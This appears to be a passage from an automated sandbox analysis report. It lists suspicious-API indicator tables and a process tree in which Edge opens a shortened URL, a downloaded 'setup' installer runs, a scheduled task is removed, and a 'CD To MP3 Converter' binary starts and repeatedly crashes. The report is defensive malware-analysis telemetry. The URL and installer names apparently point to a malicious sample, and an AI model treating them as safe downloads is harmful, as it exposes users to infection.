N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3ME7O.tmp\setup_NUyyEY7ilu.tmp N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5116 wrote to memory of 4672 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 4672 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 1356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 4132 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 4132 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 2092 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 2092 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 2092 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 2092 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 2092 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 2092 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 2092 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 2092 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 2092 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 2092 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 2092 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 2092 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 2092 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 2092 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 2092 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 2092 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 2092 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 2092 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 2092 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5116 wrote to memory of 2092 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ify.ac/1Ic5

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcebd73cb8,0x7ffcebd73cc8,0x7ffcebd73cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1864 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2660 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5252 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5260 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2480 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6620 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6696 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Desktop\setup_NUyyEY7ilu.exe

"C:\Users\Admin\Desktop\setup_NUyyEY7ilu.exe"

C:\Users\Admin\AppData\Local\Temp\is-3ME7O.tmp\setup_NUyyEY7ilu.tmp

"C:\Users\Admin\AppData\Local\Temp\is-3ME7O.tmp\setup_NUyyEY7ilu.tmp" /SL5="$802CA,6467263,56832,C:\Users\Admin\Desktop\setup_NUyyEY7ilu.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "cd_2_mp3-converter_7143"

C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe

"C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe" f563236f440fa25704e51ae95b9625e4

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 840

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 848

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 924

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1044

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1088

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1048

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1144

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1160

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1152

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1056

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1152

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1048

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1048

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

